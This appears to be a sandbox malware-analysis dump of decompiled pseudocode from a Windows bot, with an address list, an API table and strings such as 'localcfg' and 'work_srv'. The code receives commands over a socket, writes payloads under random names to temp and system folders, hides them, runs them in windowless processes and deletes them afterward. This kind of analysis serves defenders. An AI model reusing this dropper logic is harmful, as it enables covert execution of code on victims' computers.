																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t579 = E0040EE95( &_v408, ".dat");
																				__eflags = _t579;
																				if(_t579 != 0) {
																					SetFileAttributesA( &_v408, 2);
																				}
																			}
																			_v12 = 1;
																			_t552 = E0040EE95( &_v408, ".dat");
																			_pop(_t712);
																			__eflags = _t552;
																			if(_t552 == 0) {
																				L143:
																				__eflags =  *_t797 & 0x00000040;
																				if(( *_t797 & 0x00000040) != 0) {
																					E00408E26(_t712, _t748, 0x22c80c, 0, 0, 0, 0,  &_v56);
																					_t811 = _t811 + 0x18;
																				}
																				__eflags =  *_t797 & 0x00000002;
																				if(( *_t797 & 0x00000002) != 0) {
																					__eflags = _v12;
																					if(__eflags != 0) {
																						E00407EAD(_t748, __eflags, 1);
																						E00407FCF(_t712);
																						_t770 = 0x44;
																						E0040EE2A(_t712,  &_v876, 0, _t770);
																						_t811 = _t811 + 0x10;
																						_v876.cb = _t770;
																						_t527 = CreateProcessA( &_v408, 0x410264, 0, 0, 0, 0x8000000, 0, 0,  &_v876,  &_v424);
																						__eflags = _t527;
																						if(_t527 == 0) {
																							E00407EE6(_t712);
																							E00407EAD(_t748, __eflags, 0);
																							DeleteFileA( &_v408);
																						} else {
																							CloseHandle(_v424.hThread);
																							CloseHandle(_v424);
																						}
																					}
																				}
																				goto L150;
																			} else {
																				E0040EE2A(_t712,  &_v408, 0, 0x120);
																				GetEnvironmentVariableA(E00402544("PromptOnSecureDesktop", 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																				E0040EE2A(_t712, "PromptOnSecureDesktop", 0, 0x100);
																				_t559 =  &_v408;
																				_t811 = _t811 + 0x2c;
																				_t773 = _t559 + 1;
																				do {
																					_t712 =  *_t559;
																					_t559 = _t559 + 1;
																					__eflags = _t712;
																				} while (_t712 != 0);
																				_t560 = _t559 - _t773;
																				__eflags = _t560;
																				if(_t560 != 0) {
																					__eflags =  *((char*)(_t806 + _t560 - 0x195)) - 0x5c;
																					if( *((char*)(_t806 + _t560 - 0x195)) != 0x5c) {
																						 *((char*)(_t806 + _t560 - 0x194)) = 0x5c;
																					}
																				}
																				lstrcatA( &_v408,  &(_t797[0x104]));
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t575 = E0040EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t575;
																					if(_t575 != 0) {
																						SetFileAttributesA( &_v408, 0x80);
																					}
																				}
																				_t774 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																				__eflags = _t774 - 0xffffffff;
																				if(_t774 != 0xffffffff) {
																					WriteFile(_t774,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
																					CloseHandle(_t774);
																					__eflags = _v39 - 0xc;
																					if(_v39 == 0xc) {
																						_t571 = E0040EE95( &_v408, ".dat");
																						_pop(_t712);
																						__eflags = _t571;
																						if(_t571 != 0) {
																							SetFileAttributesA( &_v408, 2);
																						}
																					}
																				}
																				goto L143;
																			}
																		}
																	}
																	_t588 = E0040ECA5();
																	_t711 = 5;
																	_t748 = _t588 % _t711 + 3;
																	__eflags = _t748;
																	_v17 = _t748;
																	if(_t748 == 0) {
																		L99:
																		 *(_t806 + _t765 - 0x194) = 0;
																		_t590 =  *_t797;
																		__eflags = _t590 & 0x0000000a;
																		if((_t590 & 0x0000000a) != 0) {
																			_t502 = E00402544("PromptOnSecureDesktop", 0x410694, 5, 0xe4, 0xc8);
																			_t811 = _t811 + 0x14;
																			goto L106;
																		}
																		__eflags = _t590 & 0x00000010;
																		if((_t590 & 0x00000010) == 0) {
																			__eflags = _t590 & 0x00000020;
																			if((_t590 & 0x00000020) == 0) {
																				goto L108;
																			}
																			_push(".dat");
																			goto L107;
																		}
																		_push(".sys");
																		goto L107;
																	} else {
																		goto L98;
																	}
																	do {
																		L98:
																		_t591 = E0040ECA5();
																		_t711 = 0x19;
																		_t748 = _t591 % _t711 + 0x61;
																		 *(_t806 + _t765 - 0x194) = _t748;
																		_t765 = _t765 + 1;
																		_t155 =  &_v17;
																		 *_t155 = _v17 - 1;
																		__eflags =  *_t155;
																	} while ( *_t155 != 0);
																	goto L99;
																}
																_t615 =  *((intOrPtr*)(_t806 + _t765 - 0x195));
																__eflags = _t615 - 0x5c;
																if(_t615 != 0x5c) {
																	__eflags = _t615 - 0x2f;
																	L85:
																	if(__eflags != 0) {
																		 *(_t806 + _t765 - 0x194) = 0x5c;
																		_t765 = _t765 + 1;
																	}
																}
																goto L96;
																L69:
																_t748 =  *_t609;
																_t609 =  &(_t609[1]);
																__eflags = _t748;
																if(_t748 != 0) {
																	goto L69;
																} else {
																	__eflags = _t609 - _t726;
																	E0040EE08( &_v408, _t780, _t609 - _t726);
																	_t613 =  &_v408;
																	_t811 = _t811 + 0xc;
																	_t781 = _t613 + 1;
																	goto L71;
																}
															}
														}
													}
													__eflags =  *0x41211c & 0x00000004;
													if(( *0x41211c & 0x00000004) == 0) {
														continue;
													}
													__eflags = _v60;
													if(_v60 == 0) {
														continue;
													}
													__eflags =  *0x41201d; // 0x0
													if(__eflags == 0) {
														continue;
													}
													__imp__#3(_v16);
													Sleep(0x3e8);
													E0040E318();
													ExitProcess(0);
												} else {
													_t798 =  &(_t796[8]);
													__eflags = _t798;
													do {
														_t621 =  *(_t798 - 4);
														__eflags = _t621;
														if(_t621 == 0) {
															_v60 = 1;
															 *0x412138 =  *_t798;
														} else {
															_t624 = _t621 - 1;
															__eflags = _t624;
															if(_t624 == 0) {
																E0040EA84(1, "localcfg", "lid_file_upd",  *_t798);
																_t811 = _t811 + 0x10;
																 *0x41213c =  *_t798;
															} else {
																__eflags = _t624 == 1;
																if(_t624 == 1) {
																	E0040EA84(1, "localcfg", "flags_upd",  *_t798);
																	_t811 = _t811 + 0x10;
																	 *0x41211c =  *0x41211c |  *_t798;
																}
															}
														}
														_t764 = _t764 + 1;
														_t798 =  &(_t798[2]);
														__eflags = _t764 -  *_v8;
													} while (_t764 <  *_v8);
													goto L57;
												}
											}
											__eflags = _t395 - 0x1b;
											if(_t395 != 0x1b) {
												goto L156;
											}
											__eflags = _v52 - 0xc;
											if(_v52 <= 0xc) {
												_t630 =  *0x4136b0;
												 *0x4121a4 = _t630[4];
												 *0x4122d4 = _t630[8];
												_t632 = E0040F04E(0);
												asm("adc edx, ebx");
												 *0x4136a8 = _t632 + 0xe10;
												 *0x4136ac = _t748;
												continue;
											}
											_t634 = E00407E2F(_t748);
											__eflags = _t634;
											if(_t634 != 0) {
												continue;
											}
											_v12 =  *0x4136b0;
											__eflags =  *0x4121a8; // 0x0
											if(__eflags == 0) {
												L45:
												_t636 = _v12;
												 *0x4121a4 =  *(_t636 + 4);
												 *0x4122d4 =  *(_t636 + 8);
												E00407EAD(_t748, __eflags, 0);
												goto L46;
											} else {
												GetTempPathA(0x120,  &_v408);
												_t642 = E00408274( &_v408);
												_pop(_t709);
												_t782 = _t642;
												_t801 = (E0040ECA5() & 0x00000003) + 5;
												goto L38;
												L38:
												__eflags = _t801;
												if(_t801 > 0) {
													_t644 = E0040ECA5();
													_t709 = 0x1a;
													_t748 = _t644 % _t709 + 0x61;
													 *(_t806 + _t782 - 0x194) = _t748;
													_t782 = _t782 + 1;
													_t801 = _t801 - 1;
													__eflags = _t801;
													goto L38;
												} else {
													E0040EF00(_t806 + _t782 - 0x194, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
													E0040EE2A(_t709, 0x4122f8, 0, 0x100);
													_t811 = _t811 + 0x28;
													_t651 = CreateFileA( &_v408, 0x40000000, 0, 0, 2, 0, 0);
													_v8 = _t651;
													__eflags = _t651 - 0xffffffff;
													if(__eflags != 0) {
														_t657 = WriteFile(_v8,  &(_v12[0xc]), _v52 + 0xfffffff4,  &_v100, 0);
														_push(_v8);
														__eflags = _t657;
														if(__eflags == 0) {
															CloseHandle();
														} else {
															CloseHandle();
															_push(0x4121a8);
															_push( &_v408);
															wsprintfA( &_v1176, E00402544(0x4122f8, 0x410fe4, 0xc, 0xe4, 0xc8));
															E0040EE2A(_t709, 0x4122f8, 0, 0x100);
															_t803 = 0x44;
															E0040EE2A(_t709,  &_v808, 0, 0x4122f8);
															_v808.cb = _t803;
															E0040EE2A(_t709,  &_v120, 0, 0x10);
															_t811 = _t811 + 0x48;
															E00407FCF(_t709);
															_t673 = CreateProcessA(0,  &_v1176, 0, 0, 0, 0x8000000, 0, 0,  &_v808,  &_v120);
															__eflags = _t673;
															if(_t673 != 0) {
																WaitForSingleObject(_v120.hProcess, 0xea60);
																CloseHandle(_v120.hThread);
																CloseHandle(_v120);
																_t681 = E0040F04E(0) + 0xe10;
																__eflags = _t681;
																asm("adc edx, ebx");
																_pop(_t709);
																 *0x4136a8 = _t681;
																 *0x4136ac = _t748;
															}
															E00407EE6(_t709);
															DeleteFileA( &_v408);
														}
													}
													goto L45;
												}
											}
										}
										L228:
										__imp__#3(_v16);
										E0040E318();
										return _v68;
									} else {
										__imp__#3(_v16);
										goto L21;
									}
								}
								L15:
								__imp__#3(_v16);
							}
							return E0040C8AA(_t829);
						} else {
							_t805 =  *0x413670;
							while(_v12 < _t805) {
								asm("cdq");
								_t747 = (_t747 + 1) % _t805;
								 *0x41367c =  *0x41367c + 1;
								_v12 =  &(_v12[1]);
								 *0x413674 = _t747;
								if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) == 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					}
					_t686 = E0040EBCC(0x100000);
					 *0x4136b0 = _t686;
					if(_t686 == 0) {
						goto L21;
					}
					goto L7;
				}
			}

0x0040c921
0x0040c924
0x0040c92d
0x0040c937
0x0040c937
0x0040c942
0x0040cb69
0x0040cb69
0x00000000
0x0040c954
0x0040c973
0x0040c986
0x0040c98b
0x0040c990
0x0040c993
0x0040c99e
0x0040c9b8
0x0040c9b8
0x0040c9be
0x0040c9c9
0x0040c9d0
0x0040c9fd
0x0040c9fd
0x0040ca00
0x0040ca03
0x0040ca08
0x00000000
0x00000000
0x0040ca18
0x0040ca1f
0x0040ca22
0x0040ca24
0x0040ca3f
0x0040ca44
0x0040ca47
0x0040ca49
0x0040ca5e
0x0040ca63
0x0040ca6e
0x0040ca6f
0x00000000
0x00000000
0x0040ca71
0x0040ca78
0x00000000
0x00000000
0x0040ca7a
0x0040ca81
0x00000000
0x00000000
0x0040ca95
0x0040ca9b
0x0040caa1
0x0040caa7
0x0040cab8
0x0040cac2
0x0040cac5
0x0040cad4
0x0040cae7
0x0040caf7
0x0040cb09
0x0040cb27
0x0040cb2d
0x0040cb37
0x0040cb3d
0x0040cb47
0x0040cb4d
0x0040cb54
0x0040cb59
0x0040cb5c
0x0040cb5e
0x0040cb70
0x0040cb76
0x0040cb7c
0x0040cb7c
0x0040cb7c
0x0040cb9e
0x0040cba3
0x0040cba6
0x0040cba9
0x00000000
0x00000000
0x0040cbaf
0x0040cbb1
0x00000000
0x00000000
0x0040cbb3
0x0040cbb6
0x0040cbb8
0x0040daea
0x0040daea
0x0040daeb
0x0040daf0
0x0040daf2
0x0040daf5
0x0040daf7
0x0040dafd
0x0040daff
0x0040db02
0x0040db0b
0x0040db1b
0x0040db20
0x0040db20
0x0040db02
0x0040dafd
0x0040db23
0x0040db24
0x0040db24
0x00000000
0x0040db29
0x0040cbbe
0x0040cbc1
0x0040d662
0x0040d667
0x0040d669
0x0040d66c
0x0040d66f
0x0040d672
0x0040d675
0x0040d6c7
0x0040d6c7
0x0040d6cb
0x0040d707
0x0040d707
0x0040d70b
0x0040d754
0x0040d754
0x0040d758
0x0040d79e
0x0040d79e
0x0040d7a2
0x0040d8b3
0x0040d8b3
0x0040d8ba
0x0040d93a
0x0040d93a
0x0040d941
0x0040da0e
0x0040da0e
0x0040da11
0x0040da11
0x0040da14
0x00000000
0x00000000
0x0040da1d
0x0040da23
0x0040da25
0x0040da90
0x0040da90
0x0040da94
0x0040da9b
0x00000000
0x00000000
0x0040daa1
0x0040daa4
0x00000000
0x00000000
0x0040dabf
0x0040dac2
0x0040dac7
0x0040daca
0x0040dacc
0x00000000
0x00000000
0x00000000
0x0040dacc
0x0040da27
0x0040da2a
0x0040da2c
0x00000000
0x00000000
0x0040da42
0x0040da7d
0x0040da7d
0x0040da80
0x0040da83
0x0040da85
0x00000000
0x00000000
0x0040da5f
0x0040da64
0x0040da67
0x0040da69
0x0040da89
0x00000000
0x0040da89
0x0040da7a
0x0040da7a
0x00000000
0x0040da87
0x00000000
0x0040da11
0x0040d947
0x0040d94c
0x0040d94e
0x00000000
0x00000000
0x0040d955
0x0040d95b
0x0040d961
0x00000000
0x00000000
0x0040d967
0x0040d975
0x0040d975
0x0040d97b
0x00000000
0x00000000
0x0040d981
0x0040d987
0x0040d9c9
0x0040d9c9
0x0040d9ce
0x0040d9d0
0x0040d9d6
0x0040d9d9
0x0040d9df
0x0040d9f7
0x0040d9fe
0x0040da03
0x0040da06
0x0040da08
0x00000000
0x00000000
0x00000000
0x0040da08
0x0040d998
0x0040d99a
0x0040d99d
0x0040d99f
0x0040d9ab
0x0040d9b4
0x0040d9b9
0x0040d9be
0x0040d9be
0x0040d9c1
0x0040d9c7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d9c7
0x0040d969
0x0040d96f
0x00000000
0x00000000
0x00000000
0x0040d96f
0x0040d8da
0x0040d8df
0x0040d8e4
0x0040d8e7
0x0040d8ea
0x0040d8ea
0x0040d8ec
0x0040d8ed
0x0040d8ed
0x0040d8f1
0x0040d8f3
0x0040d8f6
0x0040d8f8
0x00000000
0x00000000
0x0040d903
0x0040d918
0x0040d92a
0x0040d92f
0x0040d932
0x0040d934
0x00000000
0x00000000
0x00000000
0x0040d934
0x0040d7a8
0x0040d7aa
0x0040d7b0
0x0040d7be
0x0040d7c3
0x0040d7cf
0x0040d7d6
0x0040d7e1
0x0040d7e2
0x0040d7e2
0x0040d7e5
0x0040d7ed
0x0040d7ee
0x0040d7f4
0x0040d81f
0x0040d825
0x0040d828
0x0040d828
0x0040d82a
0x0040d830
0x0040d832
0x0040d85b
0x0040d85b
0x0040d85d
0x00000000
0x00000000
0x0040d878
0x0040d87f
0x0040d884
0x0040d887
0x0040d889
0x00000000
0x00000000
0x0040d88f
0x0040d895
0x0040d897
0x0040d897
0x0040d89d
0x0040d8a2
0x0040d8a4
0x0040d8a7
0x0040d8ad
0x0040d8ad
0x00000000
0x0040d834
0x0040d834
0x0040d836
0x0040d836
0x0040d839
0x0040d839
0x0040d83b
0x0040d83c
0x0040d83c
0x0040d842
0x0040d850
0x0040d855
0x0040d858
0x0040d858
0x00000000
0x0040d858
0x0040d832
0x0040d783
0x0040d792
0x0040d797
0x0040d79a
0x0040d79c
0x00000000
0x00000000
0x0040d773
0x0040d778
0x0040d77b
0x0040d77d
0x00000000
0x00000000
0x0040d77d
0x00000000
0x0040d783
0x0040d70d
0x0040d712
0x0040d718
0x0040d71f
0x0040d721
0x00000000
0x00000000
0x0040d73d
0x0040d744
0x0040d749
0x0040d74c
0x0040d74e
0x00000000
0x00000000
0x00000000
0x0040d74e
0x0040d6d3
0x0040d6f0
0x0040d6f7
0x0040d6fc
0x0040d6ff
0x0040d701
0x00000000
0x00000000
0x00000000
0x0040d701
0x0040d67a
0x0040d67b
0x0040d67c
0x0040d6bb
0x0040d6bb
0x0040d6c0
0x0040d6c3
0x0040d6c5
0x00000000
0x00000000
0x0040d67f
0x0040d696
0x0040d69d
0x0040d6a2
0x0040d6a5
0x0040d6a7
0x00000000
0x00000000
0x0040d6b0
0x0040d6b0
0x0040d6b3
0x0040d6b4
0x0040d6b5
0x0040d6b5
0x00000000
0x0040d6bb
0x0040cbc7
0x0040cbca
0x0040d5f2
0x0040d5f8
0x0040d5fa
0x0040d611
0x0040d616
0x0040d61e
0x0040d621
0x0040d623
0x0040d62e
0x0040d635
0x0040d637
0x0040d63d
0x0040d643
0x0040d649
0x0040d64f
0x0040d655
0x0040d65a
0x0040d65a
0x0040d637
0x0040d623
0x00000000
0x0040d5fa
0x0040cbd0
0x0040cbd3
0x0040d5e1
0x0040cdec
0x00000000
0x0040cdec
0x0040cbd9
0x0040d589
0x0040d589
0x0040d589
0x0040d58b
0x0040d58b
0x0040d591
0x0040d593
0x00000000
0x00000000
0x0040d595
0x0040d598
0x0040d59a
0x00000000
0x00000000
0x0040d59c
0x0040d59e
0x0040d59e
0x0040d5a1
0x0040d5a1
0x0040d5a3
0x0040d5a5
0x00000000
0x00000000
0x0040d5a7
0x0040d5aa
0x0040d5c3
0x0040d5c5
0x00000000
0x0040d5c5
0x0040d5ac
0x0040d5ad
0x0040d5b0
0x0040d5b3
0x00000000
0x00000000
0x00000000
0x0040d5b5
0x0040d5c8
0x0040d5c8
0x0040d5cb
0x0040d5cb
0x00000000
0x0040d5d3
0x0040cbdf
0x0040cbe2
0x0040ce26
0x0040ce2c
0x0040ce2e
0x0040ce31
0x0040ce34
0x0040ce36
0x0040cea0
0x0040cea6
0x0040cea8
0x0040ceaf
0x0040ceb9
0x0040cebf
0x0040cec2
0x0040d53e
0x0040d53e
0x0040d541
0x00000000
0x00000000
0x0040cec9
0x0040cecc
0x00000000
0x00000000
0x0040ced2
0x0040ced5
0x0040d519
0x0040d519
0x0040d524
0x0040d526
0x0040d529
0x0040d53b
0x00000000
0x0040cedb
0x0040cee8
0x0040ceed
0x0040ceef
0x0040cef2
0x0040cef4
0x0040cef9
0x0040cefe
0x0040cf00
0x0040cf00
0x0040cf02
0x0040cf02
0x0040cf04
0x0040cf06
0x0040cf0b
0x0040cf0d
0x0040cf12
0x0040cf14
0x0040cf1a
0x0040cf20
0x0040cf20
0x0040cf1c
0x0040cf1c
0x0040cf1c
0x0040cf25
0x0040cf25
0x0040cf27
0x0040cf29
0x0040cf2b
0x0040cf81
0x0040cf83
0x0040cfdc
0x0040cfe1
0x0040d020
0x0040d025
0x00000000
0x00000000
0x0040d033
0x0040d039
0x0040d03f
0x0040d042
0x0040d042
0x0040d044
0x0040d045
0x0040d045
0x0040d049
0x0040d04b
0x0040d04d
0x0040d04f
0x0040d057
0x0040d059
0x0040d059
0x0040d057
0x0040d06d
0x0040d073
0x0040d07a
0x0040d07a
0x0040d07d
0x0040d07d
0x0040d07f
0x0040d080
0x0040d080
0x0040d084
0x0040d084
0x00000000
0x0040d084
0x0040cfef
0x0040cff5
0x0040cffb
0x0040cffe
0x0040cffe
0x0040d000
0x0040d001
0x0040d001
0x0040d005
0x0040d005
0x00000000
0x0040cf85
0x0040cfb1
0x0040cfbe
0x0040cfc3
0x0040cfc9
0x0040cfcc
0x0040cfcf
0x0040cfcf
0x0040cfd1
0x0040cfd2
0x0040cfd2
0x0040cfd8
0x0040d007
0x0040d007
0x0040d009
0x00000000
0x00000000
0x0040d00b
0x00000000
0x0040d00b
0x0040cf2d
0x0040cf2d
0x0040cf30
0x0040cf32
0x0040cf32
0x0040cf58
0x0040cf58
0x0040cf58
0x0040cf5a
0x0040cf5b
0x0040cf5b
0x0040cf61
0x0040cf63
0x0040cf65
0x0040d086
0x0040d086
0x0040d089
0x0040d0fe
0x0040d104
0x0040d104
0x0040d105
0x0040d10c
0x0040d112
0x0040d112
0x0040d115
0x0040d124
0x0040d129
0x0040d129
0x0040d12c
0x0040d130
0x0040d13e
0x0040d144
0x0040d145
0x0040d147
0x0040d155
0x0040d155
0x0040d147
0x0040d177
0x0040d179
0x0040d17c
0x0040d33e
0x0040d372
0x0040d37f
0x0040d384
0x0040d38a
0x0040d38d
0x0040d390
0x0040d390
0x0040d392
0x0040d393
0x0040d393
0x0040d397
0x0040d399
0x0040d39b
0x0040d39d
0x0040d3a5
0x0040d3a7
0x0040d3a7
0x0040d3a5
0x0040d3bd
0x0040d3c3
0x0040d3c7
0x0040d3d5
0x0040d3db
0x0040d3dc
0x0040d3de
0x0040d3ec
0x0040d3ec
0x0040d3de
0x0040d40e
0x0040d410
0x0040d413
0x0040d428
0x0040d42f
0x0040d435
0x0040d439
0x0040d447
0x0040d44d
0x0040d44e
0x0040d450
0x0040d45b
0x0040d45b
0x0040d450
0x0040d461
0x0040d461
0x00000000
0x0040d182
0x0040d195
0x0040d19c
0x0040d1a2
0x0040d1a6
0x0040d1b4
0x0040d1bb
0x0040d1bd
0x0040d1c8
0x0040d1c8
0x0040d1bd
0x0040d1da
0x0040d1e1
0x0040d1e7
0x0040d1e8
0x0040d1ea
0x0040d468
0x0040d468
0x0040d46b
0x0040d47a
0x0040d47f
0x0040d47f
0x0040d482
0x0040d485
0x0040d48b
0x0040d48e
0x0040d496
0x0040d49b
0x0040d4a2
0x0040d4ac
0x0040d4b1
0x0040d4d8
0x0040d4de
0x0040d4e4
0x0040d4e6
0x0040d500
0x0040d506
0x0040d513
0x0040d4e8
0x0040d4f4
0x0040d4fc
0x0040d4fc
0x0040d4e6
0x0040d48e
0x00000000
0x0040d1f0
0x0040d1fd
0x0040d231
0x0040d23e
0x0040d243
0x0040d249
0x0040d24c
0x0040d24f
0x0040d24f
0x0040d251
0x0040d252
0x0040d252
0x0040d256
0x0040d258
0x0040d25a
0x0040d25c
0x0040d264
0x0040d266
0x0040d266
0x0040d264
0x0040d27c
0x0040d282
0x0040d286
0x0040d294
0x0040d29a
0x0040d29b
0x0040d29d
0x0040d2ab
0x0040d2ab
0x0040d29d
0x0040d2cd
0x0040d2cf
0x0040d2d2
0x0040d2eb
0x0040d2f2
0x0040d2f8
0x0040d2fc
0x0040d30e
0x0040d314
0x0040d315
0x0040d317
0x0040d326
0x0040d326
0x0040d317
0x0040d2fc
0x00000000
0x0040d2d2
0x0040d1ea
0x0040d17c
0x0040d08b
0x0040d094
0x0040d097
0x0040d097
0x0040d09a
0x0040d09d
0x0040d0bb
0x0040d0bb
0x0040d0c2
0x0040d0c4
0x0040d0c6
0x0040d0f4
0x0040d0f9
0x00000000
0x0040d0f9
0x0040d0c8
0x0040d0ca
0x0040d0d3
0x0040d0d5
0x00000000
0x00000000
0x0040d0d7
0x00000000
0x0040d0d7
0x0040d0cc
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d09f
0x0040d09f
0x0040d09f
0x0040d0a8
0x0040d0ab
0x0040d0ae
0x0040d0b5
0x0040d0b6
0x0040d0b6
0x0040d0b6
0x0040d0b6
0x00000000
0x0040d09f
0x0040cf6b
0x0040cf72
0x0040cf74
0x0040cf7a
0x0040d013
0x0040d013
0x0040d015
0x0040d01d
0x0040d01d
0x0040d013
0x00000000
0x0040cf35
0x0040cf35
0x0040cf37
0x0040cf38
0x0040cf3a
0x00000000
0x0040cf3c
0x0040cf3c
0x0040cf47
0x0040cf4c
0x0040cf52
0x0040cf55
0x00000000
0x0040cf55
0x0040cf3a
0x0040cf2b
0x0040ced5
0x0040d547
0x0040d54e
0x00000000
0x00000000
0x0040d554
0x0040d557
0x00000000
0x00000000
0x0040d55d
0x0040d563
0x00000000
0x00000000
0x0040d56c
0x0040d577
0x0040d57d
0x0040d583
0x0040ce38
0x0040ce38
0x0040ce38
0x0040ce3b
0x0040ce3f
0x0040ce3f
0x0040ce40
0x0040ce89
0x0040ce90
0x0040ce42
0x0040ce42
0x0040ce42
0x0040ce43
0x0040ce76
0x0040ce7d
0x0040ce80
0x0040ce45
0x0040ce45
0x0040ce46
0x0040ce56
0x0040ce5d
0x0040ce60
0x0040ce60
0x0040ce46
0x0040ce43
0x0040ce98
0x0040ce99
0x0040ce9c
0x0040ce9c
0x00000000
0x0040ce3b
0x0040ce36
0x0040cbe8
0x0040cbeb
0x00000000
0x00000000
0x0040cbf1
0x0040cbf5
0x0040cdf2
0x0040cdfa
0x0040ce04
0x0040ce09
0x0040ce13
0x0040ce16
0x0040ce1b
0x00000000
0x0040ce1b
0x0040cbfb
0x0040cc00
0x0040cc02
0x00000000
0x00000000
0x0040cc0d
0x0040cc10
0x0040cc16
0x0040cdd2
0x0040cdd2
0x0040cdd8
0x0040cde2
0x0040cde7
0x00000000
0x0040cc1c
0x0040cc28
0x0040cc35
0x0040cc3a
0x0040cc3b
0x0040cc47
0x0040cc4a
0x0040cc64
0x0040cc64
0x0040cc66
0x0040cc4c
0x0040cc55
0x0040cc58
0x0040cc5b
0x0040cc62
0x0040cc63
0x0040cc63
0x00000000
0x0040cc68
0x0040cc8d
0x0040cc9a
0x0040cc9f
0x0040ccb4
0x0040ccba
0x0040ccbd
0x0040ccc0
0x0040ccdc
0x0040cce2
0x0040cce5
0x0040cce7
0x0040cdcc
0x0040cced
0x0040cced
0x0040ccf3
0x0040ccfe
0x0040cd21
0x0040cd2a
0x0040cd31
0x0040cd3b
0x0040cd47
0x0040cd4d
0x0040cd52
0x0040cd55
0x0040cd77
0x0040cd7d
0x0040cd7f
0x0040cd89
0x0040cd98
0x0040cd9d
0x0040cda5
0x0040cda5
0x0040cdaa
0x0040cdac
0x0040cdad
0x0040cdb2
0x0040cdb2
0x0040cdb8
0x0040cdc4
0x0040cdc4
0x0040cce7
0x00000000
0x0040ccc0
0x0040cc66
0x0040cc16
0x0040dad2
0x0040dad5
0x0040dadb
0x00000000
0x0040cb60
0x0040cb63
0x00000000
0x0040cb63
0x0040cb5e
0x0040ca4b
0x0040ca4e
0x0040ca4e
0x00000000
0x0040c9d2
0x0040c9d2
0x0040c9d8
0x0040c9e0
0x0040c9e1
0x0040c9e3
0x0040c9e9
0x0040c9f1
0x0040c9fb
0x00000000
0x00000000
0x00000000
0x0040c9fb
0x00000000
0x0040c9d8
0x0040c9d0
0x0040c9a5
0x0040c9ab
0x0040c9b2
0x00000000
0x00000000
0x00000000
0x0040c9b2

APIs

closesocket.WS2_32(?), ref: 0040CA4E
closesocket.WS2_32(?), ref: 0040CB63
GetTempPathA.KERNEL32(00000120,?), ref: 0040CC28
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040CCB4
WriteFile.KERNEL32(0040A4B3,?,-000000E8,?,00000000), ref: 0040CCDC
CloseHandle.KERNEL32(0040A4B3), ref: 0040CCED
wsprintfA.USER32 ref: 0040CD21
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040CD77
WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0040CD89
CloseHandle.KERNEL32(?), ref: 0040CD98
CloseHandle.KERNEL32(?), ref: 0040CD9D
DeleteFileA.KERNEL32(?), ref: 0040CDC4
CloseHandle.KERNEL32(0040A4B3), ref: 0040CDCC
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040CFB1
GetSystemDirectoryA.KERNEL32 ref: 0040CFEF
GetSystemDirectoryA.KERNEL32 ref: 0040D033
lstrcatA.KERNEL32(?,?), ref: 0040D10C
SetFileAttributesA.KERNEL32(?,00000080), ref: 0040D155
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040D171
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D195
CloseHandle.KERNEL32(00000000), ref: 0040D19C
SetFileAttributesA.KERNEL32(?,00000002), ref: 0040D1C8
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D231
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D27C
SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D2AB
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2C7
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2EB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2F2
SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D326
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D372
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D3BD
SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D3EC
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D408
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D428
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D42F
SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D45B
CreateProcessA.KERNEL32(?,00410264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040D4DE
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4F4
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4FC
DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D513
closesocket.WS2_32(?), ref: 0040D56C
Sleep.KERNEL32(000003E8), ref: 0040D577
ExitProcess.KERNEL32 ref: 0040D583
wsprintfA.USER32 ref: 0040D81F

Part of subcall function 0040C65C: send.WS2_32(00000000,?,00000000), ref: 0040C74B

closesocket.WS2_32(?), ref: 0040DAD5

Strings

wtm_c, xrefs: 0040C956
localcfg, xrefs: 0040CA89, 0040CA93, 0040CAC0, 0040CAD2, 0040CE4F, 0040CE6F, 0040D8D3, 0040D8FC
local_time, xrefs: 0040CACD
except_info, xrefs: 0040D8CD, 0040D8D2, 0040D8FB
work_srv, xrefs: 0040D607, 0040D60F, 0040D62C
